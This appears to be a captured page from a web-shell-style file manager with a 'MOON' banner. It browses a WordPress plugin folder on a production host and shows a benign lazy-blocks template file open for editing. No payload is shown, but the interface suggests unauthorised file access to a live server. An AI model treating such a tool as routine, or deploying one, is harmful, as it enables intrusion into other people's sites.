┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
prd-web-01.centraldc.gr
LOCATION:
/var/www/html/graviera-pro/wp-content/plugins/lazy-blocks/templates
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: template-not-found.php
<?php /** * Output notice if block template not found. * * @var $template_name * * @package lazyblocks */ // phpcs:disable VariableAnalysis.CodeAnalysis.VariableAnalysis.UndefinedVariable ?> <div class="notice notice-warning"> <?php echo wp_kses_post( sprintf( // translators: %1$s - template file path. __( 'Template file <code>%1$s</code> not found.', 'lazy-blocks' ), 'blocks/' . $template_name . '/block.php' ) ); ?> </div>
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 template-not-found.php
PHP
454 B
2026-05-20 08:40
EDIT